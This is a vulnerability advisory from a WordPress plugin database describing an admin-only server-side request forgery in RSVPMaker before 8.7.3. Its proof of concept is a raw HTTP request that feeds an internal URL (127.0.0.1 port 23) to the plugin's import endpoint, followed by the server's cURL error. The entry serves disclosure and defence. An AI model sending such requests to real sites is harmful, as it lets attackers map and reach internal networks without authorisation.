WordPress Plugin Vulnerabilities
RSVPMaker < 8.7.3 - Authenticated (admin+) SSRF
Description
The Import feature of the plugin (/wp-admin/tools.php?page=rsvpmaker_export_screen) takes an URL input and calls curl on it, without first validating it to ensure it's a remote one. As a result, a high privilege user could use that feature to scan the internal network via a SSRF attack.
Proof of Concept
Go to the Import feature (wp-admin/tools.php?page=rsvpmaker_export_screen), enter an internal URL and click 'Import' POST /wp-json/rsvpmaker/v1/importnow HTTP/1.1 Host: 172.28.128.50 Content-Length: 52 Accept: */* X-Requested-With: XMLHttpRequest X-WP-Nonce: b56e26b3f8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://172.28.128.50 Referer: http://172.28.128.50/wp-admin/tools.php?page=rsvpmaker_export_screen Accept-Language: en-US,en;q=0.9 Cookie: [admin cookies] Connection: close importrsvp=http%3A%2F%2F127.0.0.1%3A23&start=0 Response: cURL error 7: Failed to connect to 127.0.0.1 port 23: Connection refused
Affects Plugins
References
Classification
Type
SSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-29 (about 2 years ago)
Added
2021-06-29 (about 2 years ago)
Last Updated
2022-01-17 (about 2 years ago)